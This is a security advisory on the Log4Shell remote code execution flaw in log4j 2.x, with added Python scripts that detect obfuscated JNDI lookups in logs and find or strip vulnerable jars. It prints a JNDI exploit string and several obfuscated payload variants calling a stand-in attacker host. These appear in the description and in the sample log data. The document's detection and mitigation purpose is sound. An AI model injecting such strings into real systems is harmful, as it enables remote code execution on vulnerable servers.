Threat Response: Remote Code Execution vulnerability in Log4J library

10-12-2021

On Friday 10 December 2021 a new Proof-of-Concept (PoC) for a Remote Code Execution (RCE) vulnerability in the Java library log4j [2] was published [1]. The PoC appeared before a coordinated public disclosure by the developers of the software. The vulnerability is being tracked as CVE-2021-44228 [3]. In this message we inform you about the threat and the possible mitigations.

Description

An unauthenticated remote code execution vulnerability exists in the popular Java library log4j (the 2.x branch, artifact log4j-core). This library is used by many Java-based applications for logging purposes. The vulnerability allows an attacker to execute arbitrary code within the Java process. It is caused by log4j evaluating lookup expressions of the form ${prefix:value} inside logged messages; one of these lookups, the JNDI lookup, resolves its value by contacting an LDAP or RMI server named in the expression, which the attacker controls. By means of an accessible input field or a specially crafted HTTP request (for example a User-Agent header or a query parameter), the attacker can exploit the vulnerability if the data is logged by log4j. An example of input that triggers the exploit is "${jndi:ldap://attacker:443/evil.class}". Whenever this input is logged, the Java process connects to the attacker's LDAP server, which answers with a reference to a remote Java class; the JVM downloads and executes that class. Note that recent JVMs (Java 8u191 and later, and the corresponding 6, 7 and 11 updates) no longer load remote classes from LDAP by default, but the same lookup can still be turned into code execution by returning a serialized object that is deserialized using classes already on the application's classpath, so no JVM version should be considered safe on its own.

In short: applications that are remotely accessible, handle user input and use log4j 2.x (versions 2.0-beta9 up to and including 2.14.1, i.e. lower than 2.15.0) to log this input are potentially vulnerable. Log4j 1.x does not contain the JNDI lookup and is not affected by CVE-2021-44228.
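The lookup mechanism described above is also what makes naive detection fail: an attacker can nest other lookups (${lower:j}, ${::-j}, URL-encoding) so that the literal string "${jndi:" never appears in the request. The following script is an added example, not Northwave's code or part of the original advisory, that folds the two most common nesting forms the way log4j's own substitution would and then reports the lookup that log4j would actually resolve. The access-log lines and the host attacker.example are constructed for the demo; the folding covers only the lower/upper and default-value forms, so other lookups (env, sys, date) are left untouched.

```python
import re
from urllib.parse import unquote

# Nested lookups attackers wrap around "${jndi:" so that a literal substring match misses it.
# Only two forms are folded: ${lower:x}/${upper:x} and ${anything:-default} (including ${::-x}).
CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# The negative lookahead keeps "${jndi:ldap://x/:-a}" intact: log4j still performs that lookup.
DEFAULT_RE = re.compile(r"\$\{(?!jndi:)[^${}]*?:-([^${}]*)\}", re.IGNORECASE)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold_case(m):
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text, max_rounds=20):
    """Fold innermost lookups first, repeatedly, until the text stops changing."""
    text = unquote(text)  # payloads in query strings or headers are often URL-encoded
    for _ in range(max_rounds):
        folded = CASE_RE.sub(_fold_case, text)
        folded = DEFAULT_RE.sub(lambda m: m.group(1), folded)
        if folded == text:
            break
        text = folded
    return text


def extract_jndi(folded):
    """Return the complete ${jndi:...} expression from folded text, or None."""
    m = JNDI_RE.search(folded)
    if not m:
        return None
    depth = 0
    for i in range(m.start(), len(folded)):
        if folded.startswith("${", i):
            depth += 1
        elif folded[i] == "}":
            depth -= 1
            if depth == 0:
                return folded[m.start():i + 1]
    return folded[m.start():]  # unterminated expression: return the tail as-is


def is_jndi_probe(text):
    """True when, after folding, the input still contains a JNDI lookup log4j would resolve."""
    return JNDI_RE.search(normalize(text)) is not None


def scan_log_lines(lines):
    """(line number, resolved lookup) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        lookup = extract_jndi(normalize(line))
        if lookup is not None:
            hits.append((number, lookup))
    return hits


# Constructed access-log lines for the demo; no real hosts or victims.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:13:00:01 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:00:02 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:443/evil}"',
    '203.0.113.9 - - [10/Dec/2021:13:00:03 +0100] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '203.0.113.9 - - [10/Dec/2021:13:00:04 +0100] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.7 - - [10/Dec/2021:13:00:05 +0100] "GET /search?q=jndi+ldap HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, lookup in scan_log_lines(SAMPLE_LOG):
        print("line %d: %s" % (number, lookup))
```

Lines 2, 3 and 4 of the sample all resolve to a lookup against attacker.example, while line 5 (a search for the word "jndi") is not flagged. Run the scanner over reverse-proxy and application logs from before 10 December as well: the lookup is evaluated wherever the string is logged, not only at the edge.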

Impact

If an attacker succeeds in exploiting the vulnerability, they are able to execute arbitrary code with the privileges of the Java process and subsequently take over the server running the vulnerable application. All of this can be done remotely and without authentication. From the compromised server, the attacker can move on to the rest of the network. For these reasons, we classify the impact of this vulnerability as high.

Risk

The vulnerable code is located in a popular library present in many software packages, including web applications and application servers. Because these types of applications are typically accessible directly from the internet, and the payload can be delivered in any logged field, it is trivial for an attacker to reach a vulnerable server and attack it. We therefore classify the risk as high.

Mitigation

A new version of log4j, version 2.15.0, is available at this moment [4].

If any of the applications you have built yourself contain the log4j package (log4j-core), we urgently advise upgrading to the newest version and redeploying the application. Check build dependencies as well as the deployed artifacts: the library is frequently pulled in transitively and bundled inside WAR/EAR files or fat jars.

For third-party applications you are using, we advise contacting the vendor for updates.

If upgrading is not possible right now, there are two mitigation alternatives:

  1. A temporary mitigation by setting a system property on the Java Virtual Machine running the application (effective on log4j 2.10 and later only):
     -Dlog4j2.formatMsgNoLookups=true
     The same effect can be obtained with the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. Note that this setting was later found to be an incomplete mitigation (tracked as CVE-2021-45046); prefer option 2 or the upgrade.
  2. Removal of the class "JndiLookup" from the log4j-core jar on the Java classpath, e.g.:
     zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
     Apply this to every copy of the library, including copies embedded in WAR/EAR files or fat jars, and restart the application afterwards.
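To apply the mitigation above you first have to find every copy of log4j-core, including copies nested inside other archives, and you cannot rely on the presence of JndiLookup.class alone because 2.15.0 still ships that class. The script below is an added example, not Northwave's check and not part of the original advisory: it walks a directory, inspects jars (recursing into wars, ears and fat jars), classifies each copy by version and class presence, and strips JndiLookup.class from a jar the same way the zip command does. The jars it builds for the demo are constructed stand-ins that contain only the two entries the scanner looks at; the entry paths themselves are the ones real log4j-core jars carry.

```python
import io
import os
import shutil
import tempfile
import zipfile

# Entry paths that real log4j-core jars carry; every jar built below is a constructed stand-in.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
FIXED_VERSION = (2, 15, 0)

def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0); None stays None."""
    return None if version is None else tuple(int(p) for p in version.split("-")[0].split("."))

def version_from_pom(zf):
    """Artifact version from the Maven pom.properties inside log4j-core, if the jar has it."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None

def assess(finding):
    """2.15.0 still ships JndiLookup.class, so class presence alone says nothing: check the version."""
    if not finding["jndi_lookup_present"]:
        return "mitigated"  # class stripped; the lookup can no longer be instantiated
    vt = version_tuple(finding["version"])
    if vt is None:
        return "unknown"  # shaded or repackaged jar without Maven metadata: inspect by hand
    return "patched" if vt >= FIXED_VERSION else "vulnerable"

def inspect_archive(data, label):
    """Findings for one archive given as bytes, recursing into nested archives (fat jars, wars, ears)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if JNDI_CLASS in names or POM_PROPS in names:
            finding = {"archive": label, "version": version_from_pom(zf),
                       "jndi_lookup_present": JNDI_CLASS in names}
            finding["status"] = assess(finding)
            findings.append(finding)
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(inspect_archive(zf.read(name), label + "!" + name))
    return findings

def scan_directory(root):
    """Walk a deployment directory and inspect every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings

def remove_jndi_lookup(jar_path):
    """Rewrite jar_path without JndiLookup.class (what the zip -d command does). True if removed."""
    tmp_path = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(tmp_path, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_CLASS:
                    dst.writestr(item, src.read(item.filename))  # keeps each entry's own settings
    os.replace(tmp_path, jar_path)
    return True

def fake_log4j_core(version):
    """Constructed stand-in for a log4j-core jar holding only the two entries the scanner looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
    return buf.getvalue()

def run_demo():
    """Constructed tree: loose 2.14.1 and 2.15.0 jars plus a war bundling 2.14.1; scan, strip, rescan."""
    root = tempfile.mkdtemp()
    for version in ("2.14.1", "2.15.0"):
        with open(os.path.join(root, "log4j-core-%s.jar" % version), "wb") as fh:
            fh.write(fake_log4j_core(version))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", fake_log4j_core("2.14.1"))
    def statuses():
        return {os.path.relpath(f["archive"], root): f["status"] for f in scan_directory(root)}
    before = statuses()
    removed = remove_jndi_lookup(os.path.join(root, "log4j-core-2.14.1.jar"))
    after = statuses()
    shutil.rmtree(root)
    return before, removed, after

if __name__ == "__main__":
    print(run_demo())
```

Point scan_directory at the deployment root of a real server (the application server's lib directories and webapps) to get the same classification. The copy inside app.war stays "vulnerable" after the loose jar has been fixed: nested copies have to be repacked or the application redeployed, which is why the advisory insists on every copy.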

What will Northwave do?

Northwave will monitor any developments regarding this vulnerability. If new critical information about this threat arises, we will reach out to you. If you need additional information you can call us by phone or send us an email.

Northwave will have a check available later today to test whether your environment is vulnerable. If you want to make use of this check, please contact the SOC.

E-mail: [email protected] Do you have an incident right now? Call our CERT number: +31 (0)85 043 7909 or 0800-1744 (only from within the Netherlands)

Northwave has released a check to determine whether you are vulnerable; please find it here: https://github.com/NorthwaveSecurity/log4jcheck/

Sources

[1]: https://github.com/tangxiaofeng7/apache-log4j-poc

[2]: https://logging.apache.org/log4j/2.x/

[3]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228, https://www.randori.com/blog/cve-2021-44228/

[4]: https://logging.apache.org/log4j/2.x/download.html

Disclaimer
Northwave has made every effort to make this information accurate and reliable. However, the information provided is without warranty of any kind and its use is at the sole risk of the user. Northwave does not accept any responsibility or liability for the accuracy, content, completeness, legality or reliability of the information provided. We shall not be liable for any loss or damage of whatever nature, direct or indirect, consequential or other, whether arising in contract, tort or otherwise, which may arise as a result of your use of, or inability to use, this information or any additional information provided by us in direct or indirect relation to the information provided here.